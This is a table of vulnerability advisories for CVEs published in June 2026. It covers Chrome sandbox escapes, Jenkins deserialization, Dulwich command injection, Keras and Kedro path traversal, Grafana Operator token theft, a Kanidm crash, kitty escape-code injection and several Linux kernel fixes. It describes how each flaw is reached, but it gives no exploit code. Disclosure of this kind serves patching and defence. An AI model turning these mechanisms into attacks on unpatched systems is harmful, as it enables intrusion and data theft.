| Google--Chrome | Inappropriate implementation in Guest View in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-06-08 | not yet calculated | CVE-2026-11701 |
| Google--Chrome | Use after free in Core in Google Chrome on Windows prior to 149.0.7827.115 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-11 | not yet calculated | CVE-2026-12007 |
| Google--Chrome | Use after free in DigitalCredentials in Google Chrome prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-11 | not yet calculated | CVE-2026-12008 |
| Google--Chrome | Insufficient validation of untrusted input in Accessibility in Google Chrome on Mac prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-11 | not yet calculated | CVE-2026-12009 |
| Google--Chrome | Heap buffer overflow in GPU in Google Chrome on Android prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-11 | not yet calculated | CVE-2026-12010 |
| Google--Chrome | Use after free in WebMIDI in Google Chrome on Windows prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-06-11 | not yet calculated | CVE-2026-12011 |
| Google--Chrome | Use after free in Network in Google Chrome prior to 149.0.7827.115 allowed an attacker in a privileged network position to potentially exploit heap corruption via malicious network traffic. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12012 |
| Google--Chrome | Use after free in Media in Google Chrome on Windows prior to 149.0.7827.115 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12013 |
| Google--Chrome | Use after free in Cast in Google Chrome prior to 149.0.7827.115 allowed an attacker on the local network segment to potentially perform a sandbox escape via malicious network traffic. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12014 |
| Google--Chrome | Use after free in Autofill in Google Chrome prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12015 |
| Google--Chrome | Inappropriate implementation in DevTools in Google Chrome prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12016 |
| Google--Chrome | Inappropriate implementation in Extensions in Google Chrome prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12017 |
| Google--Chrome | Inappropriate implementation in Mojo in Google Chrome on Windows prior to 149.0.7827.115 allowed a local attacker to perform OS-level privilege escalation via a malicious file. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12018 |
| Google--Chrome | Heap buffer overflow in Codecs in Google Chrome on Linux and ChromeOS prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12019 |
| Google--Chrome | Use after free in Autofill in Google Chrome on Mac prior to 149.0.7827.115 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12020 |
| Google--Chrome | Race in Safe Browsing in Google Chrome on Mac prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a malicious file. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12022 |
| Google--Chrome | Use after free in GPU in Google Chrome on Mac prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12023 |
| Google--Chrome | Insufficient policy enforcement in DevTools in Google Chrome prior to 149.0.7827.115 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12024 |
| Google--Chrome | Insufficient validation of untrusted input in Network in Google Chrome prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12025 |
| Google--Chrome | Out of bounds read in Video in Google Chrome on ChromeOS prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12026 |
| Google--Chrome | Inappropriate implementation in Headless in Google Chrome prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12027 |
| Google--Chrome | Use after free in GPU in Google Chrome on Android prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12028 |
| Google--Chrome | Use after free in Video in Google Chrome on Windows prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12029 |
| Google--Chrome | Out of bounds write in GPU in Google Chrome on Android prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12030 |
| Google--Chrome | Inappropriate implementation in Views in Google Chrome on Windows prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12031 |
| Google--Chrome | Inappropriate implementation in Passwords in Google Chrome on Android prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12032 |
| Google--Chrome | Out of bounds read in VideoCapture in Google Chrome prior to 149.0.7827.115 allowed a remote attacker who had compromised the GPU process to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12033 |
| Google--Chrome | Insufficient validation of untrusted input in Linux Toolkit Theming in Google Chrome on Linux prior to 149.0.7827.115 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a malicious file. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12034 |
| Google--Chrome | Use after free in Views in Google Chrome on Windows prior to 149.0.7827.115 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) | 2026-06-11 | not yet calculated | CVE-2026-12035 |
| Google--Chrome | Race in V8 in Google Chrome prior to 144.0.7559.99 allowed a remote attacker to potentially exploit type confusion via a crafted HTML page. (Chromium security severity: High) | 2026-06-10 | not yet calculated | CVE-2026-1220 |
| Google--MCP Toolbox for Databases | The Model Context Protocol has a security warning advising servers to validate the "Origin" header on all incoming connections to prevent DNS rebinding attacks. Prior to the v0.25.0 release, users had no way to validate the origin's host. In v0.25.0, a new "--allowed-hosts" flag was introduced alongside the existing "--allowed-origins" flag, enabling users to specify permitted hosts at server startup. Both flags default to "*", allowing users to implement strict access controls as needed without breaking existing setups. If either flag is set to "*", the server will output a startup warning about potential vulnerabilities. Documentation has also been updated to highlight these security considerations. | 2026-06-13 | not yet calculated | CVE-2026-11624 |
| GPAC--MP4Box v2.4 | A stack buffer overflow in the filein_process function (in_file.c) of GPAC MP4Box v2.4 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MP4 file. | 2026-06-09 | not yet calculated | CVE-2025-52292 |
| GPAC--MP4Box v2.4 | A segmentation violaton in the gf_hevc_read_sps_bs_internal function (media_tools/av_parsers.c) of GPAC MP4Box v2.4 allows attackers to cause a Denial of Service (DoS) via supplying crafted HEVC SPS data. | 2026-06-09 | not yet calculated | CVE-2025-52293 |
| GPAC--MP4Box v2.4 | A NULL pointer dereference in the gf_isom_get_user_data_count function (isomedia/isom_read.c) of GPAC MP4Box v2.4 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MP4 file. | 2026-06-09 | not yet calculated | CVE-2025-55651 |
| GPAC--MP4Box v2.4 | A NULL pointer dereference in the gf_odf_vvc_cfg_write_bs function (odf/descriptors.c) of GPAC MP4Box v2.4 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MP4 file. | 2026-06-09 | not yet calculated | CVE-2025-55657 |
| GPAC--MP4Box v2.4 | GPAC MP4Box v2.4 was discovered to contain a floating point exception in the gf_opus_parse_packet_header function (media_tools/av_parsers.c). bThis vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted MP4 file. | 2026-06-09 | not yet calculated | CVE-2025-55658 |
| GPAC--MP4Box v2.4 | A NULL pointer dereference in the ctts_box_write function (isomedia/box_code_base.c) of GPAC MP4Box v2.4 allows attackers to cause a Denial of Service (DoS) via supplying a crafted MP4 file. | 2026-06-09 | not yet calculated | CVE-2025-55659 |
| Grafana--Grafana Operator | We have released version 5.24.0 of the Grafana Operator. This patch includes a CRITICAL severity security fix for a path traversal/privilege escalation vulnerability in the Grafana Operator. ### Summary The Grafana Operator supports loading dashboards & library panels using the jsonnet data templating language. The jsonnet expression is evaluated in the context of the operator manager pod. ### Impact It is possible for a malicious user who can create Dashboard or LibraryPanel resources for a Grafana instance to obtain the Kubernetes service account token of the Grafana Operator manager. ### Affected versions All Grafana Operator versions <= 5.23 ### Solutions and mitigations All installations should be upgraded as soon as possible. As a workaround, the following ValidatingAdmissionPolicy prevent the creation or modification of jsonnet based resources: apiVersion: admissionregistration.k8s.io/v1 kind: ValidatingAdmissionPolicy metadata: name: "prevent-jsonnet-dashboards" spec: failurePolicy: Fail matchConstraints: resourceRules: - apiGroups: ["grafana.integreatly.org"] apiVersions: ["v1beta1"] operations: ["CREATE", "UPDATE"] resources: ["grafanadashboards", "grafanalibrarypanels"] validations: - expression: "!has(object.spec.jsonnetLib)" --- apiVersion: admissionregistration.k8s.io/v1 kind: ValidatingAdmissionPolicyBinding metadata: name: "prevent-jsonnet-dashboards-clusterwide" spec: policyName: "prevent-jsonnet-dashboards" validationActions: [Deny] ### Acknowledgement We would like to thank Artem Cherezov for responsibly disclosing the vulnerability. | 2026-06-13 | not yet calculated | CVE-2026-11769 |
| Haskell Programming Language--crypton-certificate | The crypton-x509-validation Haskell library fails to enforce X.509 NameConstraints, allowing TLS clients to accept certificates whose Subject Alternative Names fall outside the issuing CA's permitted subtrees. This oversight enables an attacker who compromises a name-constrained sub-CA to impersonate domains beyond its intended scope. | 2026-06-11 | not yet calculated | CVE-2026-9648 |
| HMBRAND--DBI | DBI versions before 1.648 for Perl saved errors in a limited-sized buffer. Error messages that were returned when RaiseError, PrintError or HandleError were set were written to a 200-byte buffer without a length limit. Attackers that can influence the error text in an application can trigger a buffer overflow. | 2026-06-09 | not yet calculated | CVE-2026-9698 |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct improper GPU system calls to corrupt kernel heap memory. By creating resources of certain types and presenting a set of parameters to the affected interface the exploit can be used to corrupt kernel memory. | 2026-06-08 | not yet calculated | CVE-2026-22164 |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct improper GPU system calls to cause mismanagement of a mapping state maintained for a sparse memory allocation. The product accidentally refers to the wrong memory due to the semantics of how math operations are implicitly scaled across buffers of different sizes. | 2026-06-08 | not yet calculated | CVE-2026-34194 |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct intentional GPU sparse memory API calls to cause out of bounds write in the kernel. The product incorrectly indexes internal state when performing sparse allocation remapping. | 2026-06-12 | not yet calculated | CVE-2026-34195 |
| Imagination Technologies--Graphics DDK | An attacker could cooperatively pass data from one secure GPU process to another secure GPU process through shared secure memory allocations in the kernel module. Additionally, an attacker could disrupt the operation of another secure GPU process leading to image corruption / GPU hardware recovery. Sharing secure memory allocations among various GPU secure processes allows an attacker to corrupt shared resource affecting other users. | 2026-06-12 | not yet calculated | CVE-2026-41155 |
| Imagination Technologies--Graphics DDK | A web page that contains unusual WebGPU content loaded into the GPU GLES render process and can trigger an out-of-bound write in the GPU user-space driver, leading to memory corruption and possible browser/GPU process crash. The software computes a required memory size from untrusted input, but integer overflow can produce a value smaller than needed. Subsequent write operations may then occur past the intended memory boundary, corrupting adjacent memory and causing process instability or termination. | 2026-06-12 | not yet calculated | CVE-2026-41157 |
| Imagination Technologies--Graphics DDK | Software installed and run as a non-privileged user may conduct GPU system calls to write to arbitrary freed physical pages. Physical memory allocated and freed, without the deferred free mechanism can lead to those resources being used for read/write by the GPU after the kernel module has freed the resource. | 2026-06-12 | not yet calculated | CVE-2026-41158 |
| jelmer--dulwich | Dulwich is a pure-Python implementation of the Git file formats and protocols. Starting in version 0.24.0 and prior to version 1.2.5, Dulwich's `ProcessMergeDriver` substitutes the file path (from the git tree, controllable by an attacker via a malicious branch) into the merge driver command via the `%P` placeholder and executes it with `subprocess.run(..., shell=True)`. An attacker who can cause a victim to merge an untrusted branch can achieve arbitrary command execution by crafting malicious file paths. Version 1.2.5 fixes the issue. | 2026-06-10 | not yet calculated | CVE-2026-42563 |
| Jenkins Project--Jenkins | In Jenkins 2.567 and earlier, LTS 2.555.2 and earlier, it is possible for attackers to have Jenkins deserialize arbitrary types defined in Jenkins core or plugins from an attacker-controlled `config.xml` submission in a way that allows them to handle HTTP requests afterwards. This can be used to impersonate any user and send HTTP requests on their behalf, up to and including use of the Script Console to run arbitrary code, or to read arbitrary files from the Jenkins controller. | 2026-06-10 | not yet calculated | CVE-2026-53435 |
| Jenkins Project--Jenkins | Jenkins 2.567 and earlier, LTS 2.555.2 and earlier improperly determines that a redirect URL after login is legitimately pointing to Jenkins when it contains relative path segments (`./` or `../`), allowing attackers to perform phishing attacks. | 2026-06-10 | not yet calculated | CVE-2026-53436 |
| Jenkins Project--Jenkins | Jenkins 2.567 and earlier, LTS 2.555.2 and earlier improperly determines that a redirect URL after login is legitimately pointing to Jenkins when it contains tab or newline characters between `//`, allowing attackers to perform phishing attacks. | 2026-06-10 | not yet calculated | CVE-2026-53437 |
| Jenkins Project--Jenkins | A missing permission check in Jenkins 2.567 and earlier, LTS 2.555.2 and earlier allows attackers with Item/Cancel permission, but lacking Item/Read permission, to cancel queue items they do not have permission to view. | 2026-06-10 | not yet calculated | CVE-2026-53438 |
| Jenkins Project--Jenkins | Missing permission checks in Jenkins 2.567 and earlier, LTS 2.555.2 and earlier allow attackers with Overall/Read permission to determine other users' configured timezone and to enumerate view names of other users' "My Views". | 2026-06-10 | not yet calculated | CVE-2026-53439 |
| Jenkins Project--Jenkins | Jenkins 2.567 and earlier, LTS 2.555.2 and earlier does not ensure that the "from" parameter in the "Delegate to servlet container" security realm is safe to redirect to after login, allowing attackers to perform phishing attacks by redirecting users to an attacker-controlled domain. | 2026-06-10 | not yet calculated | CVE-2026-53440 |
| Jenkins Project--Jenkins | Jenkins 2.483 through 2.567 (both inclusive), LTS 2.492.1 through 2.555.2 (both inclusive) does not escape the user-provided description of a generic offline cause that could be set through the `POST config.xml` API, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Agent/Configure permission. | 2026-06-10 | not yet calculated | CVE-2026-53441 |
| Jenkins Project--Jenkins | Jenkins 2.567 and earlier, LTS 2.555.2 and earlier does not encrypt secrets from POST config.xml submissions before storing them in job configurations unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission, or access to the Jenkins controller file system. | 2026-06-10 | not yet calculated | CVE-2026-53442 |
| kanidm--kanidm | Kanidm is an identity management platform. Prior to version 1.9.3, a single unauthenticated GET to any /scim/v1/... endpoint with a ?filter= query string of a few thousand nested parentheses (≈ 4-12 KB) drives the recursive-descent PEG parser past the worker thread's stack guard page. Rust responds to stack overflow with std::process::abort() - the entire kanidmd process exits. The parse runs inside axum's Query<ScimEntryGetQuery> extractor, before any handler body and therefore before any ACL check. This issue has been patched in version 1.9.3. | 2026-06-10 | not yet calculated | CVE-2026-46689 |
| kedro-org--kedro-org/kedro | A vulnerability in Kedro version 1.2.0 allows an attacker to exploit path traversal by providing a crafted version string. The `_get_versioned_path()` method in `kedro/io/core.py` directly interpolates user-supplied version strings into filesystem paths without sanitization. This enables an attacker to escape the intended versioned dataset directory and access files outside the expected path. The issue is also reachable through the CLI via the `--load-versions` parameter, as `_split_load_versions()` in `kedro/framework/cli/utils.py` does not validate the version string. This vulnerability can lead to unauthorized file reads, data poisoning, cross-project or cross-tenant data access, and broader downstream impacts in environments where Kedro is used with automation or orchestration layers. | 2026-06-12 | not yet calculated | CVE-2026-3840 |
| keras-team--keras-team/keras | Keras versions prior to 3.14.0 are vulnerable to a path traversal issue in the archive extraction utilities located in `keras/src/utils/file_utils.py`. The functions `filter_safe_tarinfos()` and `filter_safe_zipinfos()` validate archive member paths against the process current working directory (CWD) instead of the actual extraction destination. When the process runs with CWD set to `/`, which is common in Docker containers, CI/CD runners, and Jupyter environments, the validation boundary becomes the filesystem root, allowing traversal paths to bypass the security check. Additionally, the zip filter contains a bug that causes an `AttributeError` when a blocked entry is encountered, leading to incomplete extraction. Furthermore, Python 3.11 installations lack the `filter="data"` safety net, leaving them entirely reliant on the flawed CWD-based filter. Exploitation of this vulnerability can result in arbitrary file writes outside the intended extraction directory, enabling attackers to overwrite configuration files, inject malicious code, or corrupt machine learning datasets and pipelines. | 2026-06-11 | not yet calculated | CVE-2026-11816 |
| KnpLabs--snappy | Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.7.1, on POSIX, escapeshellarg('/usr/bin/wkhtmltopdf') returns the literal string '/usr/bin/wkhtmltopdf' with the single-quote characters included. is_executable() then looks for a file whose actual name contains those quote characters, which essentially never exists. The safe branch is dead code and $command always falls through to the raw, unescaped value. The rest of the arguments (options, input, output) are escaped correctly, so injection has to land in the binary string itself. That happens whenever the binary path is sourced from configuration that is user-influenced, derived from environment variables that ultimately come from request data, or concatenated with any user-controlled fragment. This issue has been patched in version 1.7.1. | 2026-06-10 | not yet calculated | CVE-2026-46643 |
| KnpLabs--snappy | Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.7.0, there is a SSRF and local file read vulnerability via the xsl-style-sheet option. This issue has been patched in version 1.7.0. | 2026-06-10 | not yet calculated | CVE-2026-46683 |
| Kong--Kong Enterprise Gateway | A HTTP request smuggling and desynchronization vulnerability affects Kong Gateway Enterprise 3.4, 3.10, 3.11, 3.12, 3.13, and 3.14 series. The vulnerability is caused by a parsing flaw in Kong's HTTP request processing pipeline when handling untrusted HTTP/1.1 traffic. | 2026-06-11 | not yet calculated | CVE-2026-6338 |
| kovidgoyal--kitty | Kitty is a cross-platform GPU based terminal. In versions prior to 0.47.0, it is possible to inject commands within the subshell through kitty error. A special escape code will make kitty return an error, this error is not escaped and will be correctly echoed back to the terminal with CRLF, as such it will be run by the shell in use. To exploit this bug, the victim must use a netcat or a similar program to connect to the attacker, or else listening for someone to connect. Once this condition is set, an attacker could pwn the computer of the victim using a special kitty's escape code that will run a command in the shell in use. Version 04.7.0 fixes the issue. | 2026-06-12 | not yet calculated | CVE-2026-42850 |
| kovidgoyal--kitty | Kitty is a cross-platform GPU based terminal. In versions prior to 0.47.3, kitty's OSC 21 (color-control) query reply reflects attacker-controlled bytes, including newlines, into the shell's input without sanitization. Version 0.47.3 fixes the issue. | 2026-06-12 | not yet calculated | CVE-2026-54057 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/vkms: Convert to DRM's vblank timer Replace vkms' vblank timer with the DRM implementation. The DRM code is identical in concept, but differs in implementation. Vblank timers are covered in vblank helpers and initializer macros, so remove the corresponding hrtimer in struct vkms_output. The vblank timer calls vkms' custom timeout code via handle_vblank_timeout in struct drm_crtc_helper_funcs. | 2026-06-08 | not yet calculated | CVE-2025-71315 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix zero-size GDS range init on RDNA4 RDNA4 (GFX 12) hardware removes the GDS, GWS, and OA on-chip memory resources. The gfx_v12_0 initialisation code correctly leaves adev->gds.gds_size, adev->gds.gws_size, and adev->gds.oa_size at zero to reflect this. amdgpu_ttm_init() unconditionally calls amdgpu_ttm_init_on_chip() for each of these resources regardless of size. When the size is zero, amdgpu_ttm_init_on_chip() forwards the call to ttm_range_man_init(), which calls drm_mm_init(mm, 0, 0). drm_mm_init() immediately fires DRM_MM_BUG_ON(start + size <= start) -- trivially true when size is zero -- crashing the kernel during modprobe of amdgpu on an RX 9070 XT. Guard against this by returning 0 early from amdgpu_ttm_init_on_chip() when size_in_page is zero. This skips TTM resource manager registration for hardware resources that are absent, without affecting any other GPU type. DRM_MM_BUG_ON() only asserts if CONFIG_DRM_DEBUG_MM is enabled in the kernel config. This is apparently rarely enabled as these chips have been in the market for over a year and this issue was only reported now. Oops-Analysis: http://oops.fenrus.org/reports/bugzilla.korg/221376/report.html (cherry picked from commit 5719ce5865279cad4fd5f01011fe037168503f2d) | 2026-06-08 | not yet calculated | CVE-2026-46276 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/imagination: Fix segfault when updating ftrace mask Fix invalid data access by passing right data for debugfs entry. [ 171.549793] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000 [ 171.559248] Mem abort info: [ 171.562173] ESR = 0x0000000096000044 [ 171.566227] EC = 0x25: DABT (current EL), IL = 32 bits [ 171.573108] SET = 0, FnV = 0 [ 171.576448] EA = 0, S1PTW = 0 [ 171.579745] FSC = 0x04: level 0 translation fault [ 171.584760] Data abort info: [ 171.588012] ISV = 0, ISS = 0x00000044, ISS2 = 0x00000000 [ 171.593734] CM = 0, WnR = 1, TnD = 0, TagAccess = 0 [ 171.598962] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [ 171.604471] user pgtable: 4k pages, 48-bit VAs, pgdp=0000000083837000 [ 171.611358] [0000000000000000] pgd=0000000000000000, p4d=0000000000000000 [ 171.618500] Internal error: Oops: 0000000096000044 [#1] SMP [ 171.624222] Modules linked in: powervr drm_shmem_helper drm_gpuvm... [ 171.656580] CPU: 0 UID: 0 PID: 549 Comm: bash Not tainted 7.0.0-rc2-g730b257ba723-dirty #13 PREEMPT [ 171.665773] Hardware name: BeagleBoard.org BeaglePlay (DT) [ 171.671296] pstate: 20000005 (nzCv daif -PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 171.678306] pc : pvr_fw_trace_mask_set+0x78/0x154 [powervr] [ 171.683959] lr : pvr_fw_trace_mask_set+0x4c/0x154 [powervr] [ 171.689593] sp : ffff8000835ebb90 [ 171.692929] x29: ffff8000835ebc00 x28: ffff000005c60f80 x27: 0000000000000000 [ 171.700130] x26: 0000000000000000 x25: ffff00000504af28 x24: 0000000000000000 [ 171.707324] x23: ffff00000504af50 x22: 0000000000000203 x21: 0000000000000000 [ 171.714518] x20: ffff000005c44a80 x19: ffff000005c457b8 x18: 0000000000000000 [ 171.721715] x17: 0000000000000000 x16: 0000000000000000 x15: 0000aaaae8887580 [ 171.728908] x14: 0000000000000000 x13: 0000000000000000 x12: ffff8000835ebc30 [ 171.736095] x11: ffff00000504af2a x10: ffff00008504af29 x9 : 0fffffffffffffff [ 171.743286] x8 : ffff8000835ebbf8 x7 : 0000000000000000 x6 : 000000000000002a [ 171.750479] x5 : ffff00000504af2e x4 : 0000000000000000 x3 : 0000000000000010 [ 171.757674] x2 : 0000000000000203 x1 : 0000000000000000 x0 : ffff8000835ebba0 [ 171.764871] Call trace: [ 171.767342] pvr_fw_trace_mask_set+0x78/0x154 [powervr] (P) [ 171.772984] simple_attr_write_xsigned.isra.0+0xe0/0x19c [ 171.778341] simple_attr_write+0x18/0x24 [ 171.782296] debugfs_attr_write+0x50/0x98 [ 171.786341] full_proxy_write+0x6c/0xa8 [ 171.790208] vfs_write+0xd4/0x350 [ 171.793561] ksys_write+0x70/0x108 [ 171.796995] __arm64_sys_write+0x1c/0x28 [ 171.800952] invoke_syscall+0x48/0x10c [ 171.804740] el0_svc_common.constprop.0+0x40/0xe0 [ 171.809487] do_el0_svc+0x1c/0x28 [ 171.812834] el0_svc+0x34/0x108 [ 171.816013] el0t_64_sync_handler+0xa0/0xe4 [ 171.820237] el0t_64_sync+0x198/0x19c [ 171.823939] Code: 32000262 b90ac293 1a931056 9134e293 (b9000036) [ 171.830073] ---[ end trace 0000000000000000 ]--- | 2026-06-08 | not yet calculated | CVE-2026-46278 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/alloc_tag: clear codetag for pages allocated before page_ext initialization Due to initialization ordering, page_ext is allocated and initialized relatively late during boot. Some pages have already been allocated and freed before page_ext becomes available, leaving their codetag uninitialized. A clear example is in init_section_page_ext(): alloc_page_ext() calls kmemleak_alloc(). If the slab cache has no free objects, it falls back to the buddy allocator to allocate memory. However, at this point page_ext is not yet fully initialized, so these newly allocated pages have no codetag set. These pages may later be reclaimed by KASAN, which causes the warning to trigger when they are freed because their codetag ref is still empty. Use a global array to track pages allocated before page_ext is fully initialized. The array size is fixed at 8192 entries, and will emit a warning if this limit is exceeded. When page_ext initialization completes, set their codetag to empty to avoid warnings when they are freed later. This warning is only observed with CONFIG_MEM_ALLOC_PROFILING_DEBUG=Y and mem_profiling_compressed disabled: [ 9.582133] ------------[ cut here ]------------ [ 9.582137] alloc_tag was not set [ 9.582139] WARNING: ./include/linux/alloc_tag.h:164 at __pgalloc_tag_sub+0x40f/0x550, CPU#5: systemd/1 [ 9.582190] CPU: 5 UID: 0 PID: 1 Comm: systemd Not tainted 7.0.0-rc4 #1 PREEMPT(lazy) [ 9.582192] Hardware name: Red Hat KVM, BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 [ 9.582194] RIP: 0010:__pgalloc_tag_sub+0x40f/0x550 [ 9.582196] Code: 00 00 4c 29 e5 48 8b 05 1f 88 56 05 48 8d 4c ad 00 48 8d 2c c8 e9 87 fd ff ff 0f 0b 0f 0b e9 f3 fe ff ff 48 8d 3d 61 2f ed 03 <67> 48 0f b9 3a e9 b3 fd ff ff 0f 0b eb e4 e8 5e cd 14 02 4c 89 c7 [ 9.582197] RSP: 0018:ffffc9000001f940 EFLAGS: 00010246 [ 9.582200] RAX: dffffc0000000000 RBX: 1ffff92000003f2b RCX: 1ffff110200d806c [ 9.582201] RDX: ffff8881006c0360 RSI: 0000000000000004 RDI: ffffffff9bc7b460 [ 9.582202] RBP: 0000000000000000 R08: 0000000000000000 R09: fffffbfff3a62324 [ 9.582203] R10: ffffffff9d311923 R11: 0000000000000000 R12: ffffea0004001b00 [ 9.582204] R13: 0000000000002000 R14: ffffea0000000000 R15: ffff8881006c0360 [ 9.582206] FS: 00007ffbbcf2d940(0000) GS:ffff888450479000(0000) knlGS:0000000000000000 [ 9.582208] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 9.582210] CR2: 000055ee3aa260d0 CR3: 0000000148b67005 CR4: 0000000000770ef0 [ 9.582211] PKRU: 55555554 [ 9.582212] Call Trace: [ 9.582213] <TASK> [ 9.582214] ? __pfx___pgalloc_tag_sub+0x10/0x10 [ 9.582216] ? check_bytes_and_report+0x68/0x140 [ 9.582219] __free_frozen_pages+0x2e4/0x1150 [ 9.582221] ? __free_slab+0xc2/0x2b0 [ 9.582224] qlist_free_all+0x4c/0xf0 [ 9.582227] kasan_quarantine_reduce+0x15d/0x180 [ 9.582229] __kasan_slab_alloc+0x69/0x90 [ 9.582232] kmem_cache_alloc_noprof+0x14a/0x500 [ 9.582234] do_getname+0x96/0x310 [ 9.582237] do_readlinkat+0x91/0x2f0 [ 9.582239] ? __pfx_do_readlinkat+0x10/0x10 [ 9.582240] ? get_random_bytes_user+0x1df/0x2c0 [ 9.582244] __x64_sys_readlinkat+0x96/0x100 [ 9.582246] do_syscall_64+0xce/0x650 [ 9.582250] ? __x64_sys_getrandom+0x13a/0x1e0 [ 9.582252] ? __pfx___x64_sys_getrandom+0x10/0x10 [ 9.582254] ? do_syscall_64+0x114/0x650 [ 9.582255] ? ksys_read+0xfc/0x1d0 [ 9.582258] ? __pfx_ksys_read+0x10/0x10 [ 9.582260] ? do_syscall_64+0x114/0x650 [ 9.582262] ? do_syscall_64+0x114/0x650 [ 9.582264] ? __pfx_fput_close_sync+0x10/0x10 [ 9.582266] ? file_close_fd_locked+0x178/0x2a0 [ 9.582268] ? __x64_sys_faccessat2+0x96/0x100 [ 9.582269] ? __x64_sys_close+0x7d/0xd0 [ 9.582271] ? do_syscall_64+0x114/0x650 [ 9.582273] ? do_syscall_64+0x114/0x650 [ 9.582275] ? clear_bhb_loop+0x50/0xa0 [ 9.582277] ? clear_bhb_l ---truncated--- | 2026-06-08 | not yet calculated | CVE-2026-46279 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vmalloc: fix buffer overflow in vrealloc_node_align() Commit 4c5d3365882d ("mm/vmalloc: allow to set node and align in vrealloc") added the ability to force a new allocation if the current pointer is on the wrong NUMA node, or if an alignment constraint is not met, even if the user is shrinking the allocation. On this path (need_realloc), the code allocates a new object of 'size' bytes and then memcpy()s 'old_size' bytes into it. If the request is to shrink the object (size < old_size), this results in an out-of-bounds write on the new buffer. Fix this by bounding the copy length by the new allocation size. | 2026-06-08 | not yet calculated | CVE-2026-46281 |
